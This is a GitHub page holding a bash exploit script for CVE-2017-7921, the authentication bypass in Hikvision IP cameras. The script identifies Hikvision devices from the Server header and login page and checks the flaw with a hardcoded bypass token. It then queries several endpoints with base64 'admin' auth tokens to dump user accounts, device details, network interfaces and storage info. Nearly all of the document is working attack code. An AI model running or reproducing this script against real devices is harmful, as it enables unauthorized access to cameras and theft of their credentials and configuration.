-
Notifications
You must be signed in to change notification settings - Fork 5
/
CVE-2017-7921.sh
66 lines (60 loc) · 2.94 KB
/
CVE-2017-7921.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
#!/bin/bash
LIGHT_GREEN="\033[1;32m"
YELLOW="\033[1;33m"
CYAN="\033[0;36m"
MAGENTA="\033[0;35m"
WHITE="\033[1;37m"
RED="\033[0;31m"
declare -A vulnerable_endpoints=(
["hikvision_time"]="/System/time?auth=YWRtaW46UEtTOHVpTWg1UUk4"
["hikvision_users"]="/Security/users?auth=YWRtaW46c28xWVBx"
["hikvision_device"]="/System/deviceInfo?auth=YWRtaW46a3ZEUE4"
["hikvision_network_interfaces"]="/Network/interfaces?auth=YWRtaW46OXduWA"
["hikvision_storage"]="/System/Storage/volumes?auth=YWRtaW46b0tSb0ZGNzl6"
)
check_hikvision() {
echo -e "${YELLOW}[${CYAN}!${YELLOW}]${WHITE} Checking if ${LIGHT_GREEN}$TARGET_URL$3$TARGET_PORT ${WHITE}is running Hikvision"
local server_header=$(curl -s -I -k -A "Mozilla/5.0 (iPad; CPU OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" "$TARGET_URL$3$TARGET_PORT" | grep "Server:" | awk '{print $2}'; curl -s -k "$TARGET_URL$3$TARGET_PORT" | grep "/doc/page/login.asp?_")
if [[ $server_header == *"App-webs/"* ]] || [[ $server_header == *"/doc/page/login.asp?_"* ]]; then
echo -e "${YELLOW}[${CYAN}+${YELLOW}] ${WHITE}Found Hikvision${CYAN}: ${LIGHT_GREEN}$TARGET_URL$3$TARGET_PORT"
echo ""
return 0
else
echo -e "${YELLOW}[${RED}~${YELLOW}] ${WHITE}No Hikvision found${CYAN}: ${RED}$TARGET_URL$3$TARGET_PORT"
return 1
fi
}
check_hikvision_vulnerability() {
echo -e "${YELLOW}[${CYAN}!${YELLOW}]${WHITE} Checking if ${LIGHT_GREEN}$TARGET_URL$3$TARGET_PORT ${WHITE}is vulnerable"
if curl -s -k "$TARGET_URL$3$TARGET_PORT/System/time?auth=YWRtaW46UEtTOHVpTWg1UUk4" -A "Mozilla/5.0 (iPad; CPU OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" | grep manual >/dev/null 2>&1; then
echo -e "${YELLOW}[${CYAN}+${YELLOW}] ${WHITE}Vulnerable${CYAN}: ${LIGHT_GREEN}$TARGET_URL$3$TARGET_PORT ${WHITE}"
else
echo -e "${YELLOW}[${RED}~${YELLOW}] ${WHITE}Not Vulnerable${CYAN}: ${RED}$TARGET_URL$3$TARGET_PORT ${WHITE}"
exit
fi
}
exploit_hikvision() {
for endpoint in "${vulnerable_endpoints[@]}"; do
echo ""
echo -e "${YELLOW}[${CYAN}<+>${RESET}${YELLOW}] ${WHITE}Exploiting ${LIGHT_GREEN}$TARGET_URL${CYAN}$3${YELLOW}$TARGET_PORT${MAGENTA}$endpoint ${WHITE}"
echo ""
temp_file=$(mktemp)
curl -s -k -o "$temp_file" "$TARGET_URL$3$TARGET_PORT$endpoint" >/dev/null 2>&1
if grep -q "<?xml" "$temp_file"; then
cat "$temp_file" | sed 's/xmlns="[^"]*"//g' | xmlstarlet fo | grep -o '<[^>]*>[^<]*</[^>]*>' | sed 's/[<\/>]/ /g' | awk '{printf "%-25s %-20s %-10s\n", $2, $3, $1}'
else
echo -e "${YELLOW}[${RED}<~>${RESET}${YELLOW}] ${WHITE}Exploit failed on ${LIGHT_GREEN}$TARGET_URL${CYAN}$3${YELLOW}$TARGET_PORT${MAGENTA}$endpoint"
fi
rm "$temp_file"
done
}
TARGET_URL="$1"
TARGET_PORT="$2"
echo ""
echo -e "${YELLOW}(${CYAN}i${YELLOW}) ${WHITE}Running exploit against ${LIGHT_GREEN}${LIGHT_GREEN}$TARGET_URL$3$TARGET_PORT"
sleep 2
echo ""
if check_hikvision; then
check_hikvision_vulnerability
exploit_hikvision
fi